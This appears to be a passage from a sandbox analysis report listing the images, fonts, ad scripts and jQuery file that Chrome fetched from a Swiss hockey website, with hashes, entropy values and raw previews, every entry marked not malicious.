                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................X......................C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.........X.."...................................................................................&f.k.u.V...G7.36.R...Fl....5|{..sNV..c..c..X..ba..S......O...r..qI.b.B.:.U<..r\y...O.e..*...0JK....-...il+..^i....F..%x....Qg}e.v\..k[..-.f.....s...9...6....6...l.1.....<.t.c..,wx.7...Vg.DE:......Z...m-].....X......Z.q87P....z..i...'<.bqn.#.....a..,_c.V..j.k)a.a.qX...3*6:4.k....AE...i..w).7c0[.g....c..>y.:.7w}...Y.....=.i...d.}...]"d...c.'s.........*..<Z.aA.f..{........GH.'5.....|F..t..m..3.8..`.}...."sq4..".x.y...{..........._...V.8...6...........|.....N....Ww.b...Z.x.5s..8..R....2S.....{...^w..w..Zx[....y.I.['.m]V.....I....d...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):11144
                                                                                                                                            Entropy (8bit):7.96904678603737
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:EE6F329EB1C476F411A866BC83E93070
                                                                                                                                            SHA1:AA9851A8F92FB0E8CBE9C85D8D8BBCBEDA1EBBD6
                                                                                                                                            SHA-256:AF6DDB7E4218C6990D0BCEB180455DF93A7976C877410D6AF3A6C30D431ED71B
                                                                                                                                            SHA-512:09AED418A16CBB7AEF93966FA49A94CBD92DA9DE7C7026DBABD5582D85FD51EBBAD0649BD7796AA5E3D7D8F13D6D6093D17C9AF17C9877DBE9356D89197B257A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:392/h:272/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/10/IMG_4175.jpg
                                                                                                                                            Preview:RIFF.+..WEBPVP8X..............VP8 .*.......*....>.H.K..).%u.a...M....t.T.<P..e..n....8.|.:o....].b....]...............\.............{yv...k...-._..x..g...O./...&tg...K.E_.S...e..0.Py.>.?.15..w....`..$.L.l.Hh.....R.t.Q......f...P.F...7.7.u1...yg.....P..b?!.l.!.uK..0\.".5.:K.}..^.&.l...R....(VN-jw...4S.E..C..:.s....q.{SN...`..i...{..........^$-..+D..e..>..].E................].........V.....G...V..../..{>.T..........a.iW..?...Sk......?.7..u.;- '>HB7..Q.N.......d...".F.[=4...r.>j..z..d..@.......S.2..B.[...1.`....:G3?y.uD..F....I....b..%.$.6w.U..2S:.....%...3...3.}...t..i{/.K.r....8.i....KH..`.s...$u....;......1!....\...i1..lf.]Fu.ML.i. *Q.}z.Y..Y..OEm.F.>M.N..U.....5%V_.,...q..F.....SV.SD..s.Je.tG..u.r.BJx.+s.....8}.Z.[.r...3..L..i..I9.]r......$..>r..A..3i)M.kC. .Q.=/.yZ..T&..T..\.x....](...li*...F4xu.Y.2..oc..._C.Ob.k..v...at...oL..^pF.g~-.-y...t.v .Z.S.Q/..\.`CL:...=..n|`..S....&"..|O.4.'......HI.8..94t.`K..NVF@.....v[..p......)h3...@...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 28500, version 1.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):28500
                                                                                                                                            Entropy (8bit):7.9919224116560015
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:8D327694DF3EBCBF19980F6553FE85A4
                                                                                                                                            SHA1:EBEE1E2E1C18A7DF8BE0CAE7981770823E4DB97F
                                                                                                                                            SHA-256:476CDAC0E6B6F629FE3EF9716991455B515D87DDA1651C3BE37DF4F3D3BC9A36
                                                                                                                                            SHA-512:1FA16800389256B0A70A4F519FEDCC658ECE5971F07C363BCB77B7267B1E9C3991B7F74BE16DB6223AD3B442029E4014E46EA7C87719C25F795204D2967056CC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/academicons.woff2?v=1.9.2
                                                                                                                                            Preview:wOF2......oT..........n.........................?FFTM.. .`........ ..@.....6.$..,. .......<...m..Fn..m}}(F!.q...-..............C.mh........Ev.N.9WQT..4w..8E.........>ox...'...V.k..BZrD.......!..*....rc.Z..}!.s....aJ.v..wP7..o....1.|...u./...!.p.s.l...~u.J..u.W......&..]..n#..4.AAQ.Q.h.=QL>....$.h.KbM.oZ..q3C....x.&g6.D9u..:?...=1...21..._.O...v...$...tql....DA...7[..N.vK....85... ....S@g.\.>?xE.....x.8j.....]E.9.X`.].`.YV.x7p3..jZ.oU.``.0@.R..!.\._._I.6,4.f=K.g8........Ai..z(..>S/.\X`:.....>i.;3.I^.....+....FU.vz...-.BD...o........v..F..c.H....CT..u.....@.._NSn.CQ.;3.p)tH..9.t....,AD...U4..^....3.v=Gg.B.C...R......(..... ..(kA...\..$.I9../.<}H$.........V.A.\yF...b.bn.+....H...?.^..S. ......=...4.[p.x.}..."..x.e..V-c..$BQ.......3.w..9:..=....B.......}[..,.................p.t9....Q..8......6...iE).H..Y5w>=.74!.cL!.!...|....Dm....2;{._.%AV.....w.{Q..^..5.y.2+E.`i ...4.g<....x.O....5So.!b..Gam..O...o.o..y...-..G8OiX......s..x.....B.......!..s...z
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (32138)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):106201
                                                                                                                                            Entropy (8bit):5.604123003751452
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:462604F05812AC609301A3DD6FA40DD6
                                                                                                                                            SHA1:FDC7D43C6E97D9478B5E3354A79786DA7A2623DF
                                                                                                                                            SHA-256:0E0CA346359E792A3B086F5ABE25153CC9A11541291560C6C0C2549D11628EA1
                                                                                                                                            SHA-512:FBBCB46234A4EA542C7696E013FBDB844ED0F1FA7565D4760CCE731551DCE71BBECD1ACBFA4687303A7428F7799B672E320E40DC8A1151B45CCF7370AE6C207D
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:(function(sttc){var window=this;if(window.googletag&&googletag.evalScripts){googletag.evalScripts();}if(window.googletag&&googletag._loaded_)return;var n,aa=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}},ba=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a},ca=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");},da=ca(this),ea=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},fa={},u=function(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}},w=function(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in t?f=t:f=da;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))brea
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3550
                                                                                                                                            Entropy (8bit):7.859929266281489
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:19ED7D74BBC7F8537D04AD7425011A71
                                                                                                                                            SHA1:39E79D21E53D94BB29C8FD2E9510472C14DB645F
                                                                                                                                            SHA-256:45EA574552918BAC0E725DAD4F4CA8842B20FFA7F1DE87FDBF06D42C3FC52E6F
                                                                                                                                            SHA-512:8898EE9E2E7E17ECF5EC05A14CE6603C3DDEBB690DFD96CD1122859F5E611783EA6612485887BC65D5D6B62844214031A0C306F9CC17F68E32A18285489C4A44
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/12/IMG_8775.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 .....3...*..Z.>.:.H%.".18.....jk.X4v..SWN.q..w....b?c.]=.=(y..n.y.....c.)k[...O..y...>.......{3}.i.M.../....p...........k..`..~......K......C..0Oc..Z..1....0_?Ns.....U....[.....8.S.`4.].+..z.!.z.a%G...G.9%3..X.<......mT*1.F............$...y.R.F.v. ..!8..I....... .IB..s..j... ...5R.W......y......%5.....A-...$..a.....P...5..ds..W|../.9J.6..c'.~._qz...s....P$n.z..{.f.....)..o....![.......W.:n...`.wp...4...:.3.^..{..P.da.............s..I...5.......>.@.y!.S.i;. ..5...=?d...X.<.:.k..+.Q..~x.#.r.X)..XM-.d.+....Y.P.,..5....o....N.[#..i`.Pu..>.eE..~.......b.V.e,.sY.d.H..`.Q.........j..w..%.K0t.......Z.9g.9^.*......$.....'...4x.c.d....}..7A.U..>.j..L].IhT.hm...:3.....~P;...[x1.}X.gxe..~.....=|..}n........^.&...... ..h_ ..u.8rXp..i.N.W+.6}A...C..:.W....L.^b..?.1V.Yq.sA..~....@..S.Z...G..H@......4.c.f(....j..0.l.s.H.xfoaW.-.apJ...S....L..yh.8....B.U.n8.W..E.....:..f..M.......M.Zr...n.SX.._8.C1.,.Q....F._x...;..$
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):635
                                                                                                                                            Entropy (8bit):4.823624659310731
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:C59E247834102D102760481CB79A53E3
                                                                                                                                            SHA1:065B7D9D86733C6FDF3F0615AF102910B7C5FC69
                                                                                                                                            SHA-256:EFD851603A30F5F5C6D6D2E8F6E63469013803954F2215838857B7F8A157DFF7
                                                                                                                                            SHA-512:6761FF493907BFBB58522200559C32E5425F734ABD7F40D49F0FB2D6283B953E1E8CB488A221290CA205F7DCE873D07E8A919A261F37F7B59922596FF9C40B33
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:{"fr":"false","brandSafety":{"adt":"veryLow","alc":"veryLow","dlm":"veryLow","drg":"veryLow","hat":"veryLow","off":"veryLow","vio":"veryLow"},"slots":{"myFakeSlot":{"id":"f8d37eeb-cc43-11ef-931c-1e4dcaaafca4"},"div-ad-gds-3961-3":{"id":"f8d37eee-cc43-11ef-931c-1e4dcaaafca4"},"div-ad-gds-3961-1":{"id":"f8d37ef0-cc43-11ef-931c-1e4dcaaafca4"},"div-ad-gds-3961-2":{"id":"f8d37eed-cc43-11ef-931c-1e4dcaaafca4"},"div-ad-gds-3961-1_2":{"id":"f8d37eef-cc43-11ef-931c-1e4dcaaafca4"},"div-ad-gds-3961-1_1":{"id":"f8d37eec-cc43-11ef-931c-1e4dcaaafca4"}},"custom":{"ias-kw":["IAS_3007987_PG","IAS_1510294_PG","IAS_3010460_PG","IAS_3010248_PG"]}}
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 117852, version 773.1280
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):117852
                                                                                                                                            Entropy (8bit):7.99152799541038
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:B55B1345F0B919F0CAB774EC25D6654E
                                                                                                                                            SHA1:C39DD7C713983702DE91B08AE00B194B0BDB9008
                                                                                                                                            SHA-256:232C6F6A7678304F9EFAA26F30B1610DEBC2BA9F4CD636B5E6751C8D73761B92
                                                                                                                                            SHA-512:793756B3BF0E21181D06F44593A99A1986B90DB4704F4765D4A1E8937ACF3D1D38A750C6D6082545BBC80C04FC8DC03DA5AB2B4A3F31B7F2345751050DF115FB
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/themes/colormag-pro/assets/library/font-awesome/fonts/fa-brands-400.woff2
                                                                                                                                            Preview:wOF2.......\.......e.............................6.$. .`..l..:..8.p.... %2.q...<.....eDOZ-..UUU.......~..7........?........v\.7..7....."..)..#.r.z.....S..+.].-.%.2./.{..&..D.|'F.+e.. ._/.". O...sP.....;}.U...'VH...P.6`...".1.......+.K.O...S..T..R...dK..l).!'..M............g..@.%.#..8l.<..f...............j....sf....A,i`0.$A&4........%dc.l .tb...P.9_.}fF#.2&..r.6.%.I...+Z.>"..`E....'.Z?o43.....(Kr..l.r.M..`..M{].,c/G...G.C....U.wU.[u..7.L.L..n..%..r.I2..X.)...v...s.7...1..BU.}..]..`Q:A. EB..!V.-9....\\R.}../.z.K....$...Z.a.ge".O56Vc..+g..t.....F.k'V....50.......$&..D.....d...J4..n....L.C&'3....].k4......._(..G...n.h.U...>.>_..<..yD.<"s..G.......=.Y...X..Ym ...b...@6...f..@......h6...OpD...l..Ue ..(a6d+Y..Q.5J,..b7.....Z..z.b5..lVR...P....5q!...*c...)>,.I.*...-_...X.<.p.#tM.......l{...yC..4..$...O....dS&.o.N....i..8...`4.]...l...=^.f........^.x.v|..YNo.B..W....~../...J...Nk.=c-.}....@..g.Y9...:.l.?..M\.#...y.......!.....k.Y....t.".|I.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (13479)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13577
                                                                                                                                            Entropy (8bit):5.272065782731947
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:9FFEB32E2D9EFBF8F70CAABDED242267
                                                                                                                                            SHA1:3AD0C10E501AC2A9BFA18F9CD7E700219B378738
                                                                                                                                            SHA-256:5274F11E6FB32AE0CF2DFB9F8043272865C397A7C4223B4CFA7D50EA52FBDE89
                                                                                                                                            SHA-512:8D6BE545508A1C38278B8AD780C3758AE48A25E4E12EEE443375AA56031D9B356F8C90F22D4F251140FA3F65603AF40523165E33CAE2E2D62FC78EC106E3D731
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1
                                                                                                                                            Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3706
                                                                                                                                            Entropy (8bit):7.870143322905535
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:45EF2C4B0B2AA3A4E4A7802C6DE56186
                                                                                                                                            SHA1:5C4A8642376B9D7F2A0C7737C0F2BF1AC9B390F7
                                                                                                                                            SHA-256:912FEC9FBB1DA8EFD3E8F5952E69C50587EFD58EFD3B44F4EFF41CEC5B5A029E
                                                                                                                                            SHA-512:0B72FC1A58653978A75B7877EF1E6737CFCFE6524EC6F961006E34AB532790D7B99E84C5C0A50A6F52FB8F3C0DD1E79F92AA11376F453E755B5B390B4C4FCB48
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/05/IMG_4055.jpg
                                                                                                                                            Preview:RIFFr...WEBPVP8X...........Y..VP8 .....3...*..Z.>.:.H%."!0..p...l..9.D.l..8.M..?0.G..?....Q?._...~......<.......5.\....|..>...|....G... u..............m.y....=......g..ZoI..u*.B..}.V.>6...T..Y{..1.C.+..g...t....u..{...lHH..Y/..Wj.6....!.oU.2a.$.....b.... ..........L..PQ......[Q..[.......W^...>Z.k.......t...u7...Cz..&.:....I..0R..!.{....s\.x.".....$...\......A......p4..:..d..3.v.M..EpF..t.....k.;"........ s1y9.(...L.1. ZB..9...gtXb..s......./jq...zmG....|.e(W7.a.....=!...(..,<.C0....|...'...H....\..b...:.L.6.{m2....C..,.."...NF.......A.N.f.]....3"..@...../........Y..]>.!rTc...s...g. ..r.+.=..r.....(.....n...T.w{..c_z.....'.....u..%zk.LZ...{...q.......>.5..m.9..{..,-#.)..1.....;.jLF..e.O2z..K.......^..O~Hf...@F?)...B3.d.....OH...k...<..B.J3)*;d].......-......w.....O..^HAKRoyb...J.v...b%..........q......e.y.r..n....`*.5..o...w..-..n....o.NK.,}g...%4.k.?. .}........O.f..1QV..9.....4|.....".2C.6.\">?q..&wF......%.....*.G...qRC...3...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 130x90, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):4909
                                                                                                                                            Entropy (8bit):7.830105295441827
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:64F99DBCF520BCC3DBB081AB74196DBA
                                                                                                                                            SHA1:9C2240152164AA304DFF675A5C4ED22D5D2F753A
                                                                                                                                            SHA-256:A32EBD627CCF7BD3D88CB78AB6E938ED1FF8E66EDC6E1C494593B45FBEC881E2
                                                                                                                                            SHA-512:27C727C3BA017F9542B8D896E3E887EE08D2BA880370EC4EBF0AF962D308EE3A9A502B22330D82952F97EDBB14EEDDF388228F36A77AD59FD63FBABF8A8192AA
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100................................Z..........C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......Z....".................................................................................l...o7..j........#.T.......]uH.Eg.....".....f.p...eN....o$.k....T3Q....x.......]8..%..J..n.aF.xu.,.1..w9.....1u....&v.]....M.(..Q...... .;..v`C....[8....y.t..&.inN..k . Z...>[.....S..\.tk../xA`..AFE..<.gi....=f....d).\_....S..x.?N.>.ht~9w..t.......BQ.-V.......'..............................!.."#2A..........:.9..d.....^.LO...8....#.+R-.x3..YL.9u...g.X...... ..q..W.z...G-..J...^d.o...r....s..R .l.2!..[.S8..2Q.R9..2.....e..v.'.M....-~..F.|}.|.<.....;.[i.L...b..b..".e.'.J.%...;...,7S./5.....'. .l!..T._~H.H1%HH...(.......&.5..*.K4...k.T.U..w.4...f
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Web Open Font Format, TrueType, length 13988, version 0.0
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):13988
                                                                                                                                            Entropy (8bit):7.96561358917417
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:F3F73B280148EEED102D4A6874AC7886
                                                                                                                                            SHA1:973BFCD63513292F1BB220C241F6DDE6509F1168
                                                                                                                                            SHA-256:970A3FA15876D16DCC0FD70EB7C9AB44D733108B3DDCA1A449EDD0356C1B79A7
                                                                                                                                            SHA-512:70D9B9F84523487DB748797D0FEECF4E0CCB396E4F6BB3FC634B9ECB3A8D54A6C7A9826AFC7258191BF33B15CC0871DB6AD027006FE3F9041D55D4E332C9852C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://phothockey.ch/wp-content/plugins/social-icons-widget-by-wpzoom/assets/font/Genericons.woff
                                                                                                                                            Preview:wOFF......6.......V.........................FFTM..6.........u.(OS/2.......E...`d,u.cmap.............r..cvt ... .........D..gasp..6.............glyf...T......H...I.head...0.../...6.`BWhhea...`.......$....hmtx...........8X.Srloca...$...0...0..maxp....... ... ....name..3....9...7R...post..4P...0....."..x.c`d``.b.-Z...6_..9.@..b.Z...'....X....D...&. .x.c`d`.`.........l.......D...............................@......x.c`a..8......u&.....f...$.....................U......U..D...........x.-O...P.<H.k..M..joe....!R..>.{.......y...w....tO`....pxXf`N#.?.U.'...w..x../+..X0...Io.q2...._....../.....0.wqF..h...tC.....6..T..d.8Um.........T....-..x.c```f.`..F..X..1..,..........8?I~R......./._<.D~..R.U......O...>)|f...E...../._..$|)........,|||.|L..<F<:<j<.<R<"<|<...P...F6..2F& ........m.)X...D.....,.,.,.,.Z...........F.........L...........b...0.....$.H.......8...........<.~...$.F.b.......2.....0.f.....H.......@.^.z....... .X.........J......... ...........,.@.V.d.r.......T.......,.N.|....
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3008)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):444952
                                                                                                                                            Entropy (8bit):5.579331498683747
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:DBFAE31AC9B29C409FF38E698E89FA25
                                                                                                                                            SHA1:80BC2D545E577614927E8094F07EE6AA01C9A442
                                                                                                                                            SHA-256:7A9A49EFB33627E1AFA3F0E8D1107600ADEEE7A8A78E9F67EC7BF2543BAB5693
                                                                                                                                            SHA-512:C7929C6314B274E9600F45E46F5D520783D06AC1641B4F7A92A89C67E9D7E42B56DCDDFF0E1347C4B12EA8B7BFD356393ACC23D8CD2C41B9BEE5710436EEC4AF
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:(function(sttc){'use strict';var q,aa=Object.defineProperty;function ba(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ca=ba(this),da=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",ea={},fa={};function ha(a,b,c){if(!c||a!=null){c=fa[b];if(c==null)return a[b];c=a[c];return c!==void 0?c:a[b]}} .function ia(a,b,c){if(b)a:{var d=a.split(".");a=d.length===1;var e=d[0],f;!a&&e in ea?f=ea:f=ca;for(e=0;e<d.length-1;e++){var g=d[e];if(!(g in f))break a;f=f[g]}d=d[d.length-1];c=da&&c==="es6"?f[d]:null;b=b(c);b!=null&&(a?aa(ea,d,{configurable:!0,writable:!0,value:b}):b!==c&&(fa[d]===void 0&&(a=Math.random()*1E9>>>0,fa[d]=da?ca.Symbol(d):"$jscp$"+a+"$"+d),aa(f,fa[d],{configurable:!0,writable:!0,value:b})))}}var ka=Object.create,la; .if(da&&typeof Object.setPrototypeOf=="function")la=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):4376
                                                                                                                                            Entropy (8bit):7.894580167458379
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:25154270354D9844C6F695DC4C7EE31B
                                                                                                                                            SHA1:8550308E3196D31E06E56D9A4512859AD6BDB0CB
                                                                                                                                            SHA-256:ACE0FA13F44B2B6987C53D20E7A75A79AF35633FB0A9A394D6A57B4AA96B8B02
                                                                                                                                            SHA-512:C54868546568F1C7798B1501644D18C92B4A33AF8F4036FA9FA81B6FCD00AC9EB95614F111FB73EA3C2181F9A552257AF5D3A66D360F59FFA63051DCA3877DD9
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://ml3y3bxxlq19.i.optimole.com/w:130/h:90/q:mauto/rt:fill/g:ce/ig:avif/https://phothockey.ch/wp-content/uploads/2024/03/hcv.jpg
                                                                                                                                            Preview:RIFF....WEBPVP8X...........Y..VP8 0....9...*..Z.>.:.H%...3.....f...........>.=..`<..0...].f........N.G..t=......}......~>j....}........?k.............:....`..?..3....G.?[.GW..-..9.`.FPPI.7L...J.i..f...]b9.m:.... .E.BW..O..<...b..T.)U......|%.a..7..J.{YX..+.:.z.<.0.0a.C...N.o..7....INC.t.o....s..X.w..v-.'.)V...mI...u...\...s.....q.._..(D.eYW....W...IG.V......7a..Go....?-...X.....U......n)+..K6......J......RE...tBs.^..*....?......1i./dk,e+.:.+..'g._....|.Bm"....l."Q.#..).........s....J.....Wg..".4..N.u.KgGf..j. ..>y.#....+k..:..tA.dG.....Z..bB..../,~/.|2...6:2.....;.......h...o.g....)U`.:....rl.N.v.R...X.nV.4...0.?vld.:.'...mj......s....^....x..46.H...F..*.\.{,bu...S?W;..\p-.#..l...|.B..\].0...w....%xr... @A...u/..(...uo...3....&x?{.2.V-......>.6?.?.R.C?U)...;..x..q.....Vc.k...Z../U..A..........).........<.[..TR~........cu)N5.'...)E.e...V..,6%..zZ.jm..............*......@...B..]..=W.....?..g.W].#....T.........R..{<}3*1.$.{M....@hb.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 800x445, components 3
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):45508
                                                                                                                                            Entropy (8bit):7.97231606257676
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:BF205C15C4916D888688F1C15A965FE1
                                                                                                                                            SHA1:85E61063FB39E0892D6A520889012C16117ED91C
                                                                                                                                            SHA-256:FD762A43F83CA1BE32BA0F815CF59ED02A2E87FAE77343CF9D60DAE690140A07
                                                                                                                                            SHA-512:132189703EE033078A16097237376765FD4DA2AB27F025436DB6FCFF7CF041D98687779F5B67C4D27FD67ECF608F746A90C50FBACCA3F884DF4B9B14A1661C51
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100.................... ......................C.............................0.#..#.0*3)')3*L;55;LWIEIWj__j.........C.............................0.#..#.0*3)')3*L;55;LWIEIWj__j.............. .."...................................................................................c.9..!F..:.=..o.A.`.-.1.$...A.... .m...F...H.d.9.......]V.F.D,'...xw.$.'.R.t....oh@..:j..f....Of.D&=...A....;.'.!.....+?>V8....^.......>..U...]8u.a_5..^+..QD.h.6Z"2.[*.-.)g,.&..n8..H%0.rH......d.....Aa...(7..J...<.mr7.5..n.......;..G%s].%..........KE.V..ae....v<.&.m8.a...u!+%Z.G.'.\....2w.~.C...J.......c...z.(.2.....Z.g.v..k..Fid7}_.x...>...;x..J.Z.&AHT:.g........S...A..}oX....5*..1.&`@P..'...v.....`.E..,.X.r.....S.g9.H'...t#*..Gy,.k,..FX ga.4ivj...X.../.='..4.."C.!.J.f..(.a.S.....7)Ce..q.)......0..X...DK.^..b...qp.u.5_B....][.V.R......j
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 408 x 464, 8-bit/color RGBA, non-interlaced
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18160
                                                                                                                                            Entropy (8bit):7.9507935414647015
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:
                                                                                                                                            MD5:CC6D2A2EBBDB4CA2D35C2A94F666E56C
                                                                                                                                            SHA1:7B9695FBE92878E751DB650F89A9E9A74279EE10
                                                                                                                                            SHA-256:DEDCB23076BE667A897F4A90BDE0BC80C6A6A58CFE68433BDE59546EB9B74EB5
                                                                                                                                            SHA-512:C9E27F2AAF2AEF1CA88C45EBA39DB2D1C16BAF6886EDDB39FB6723A97320E31697FB53AA8B885B1E445D2F361F91BE0A75B14399D990953D543735A400320E16
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:unknown
                                                                                                                                            URL:https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
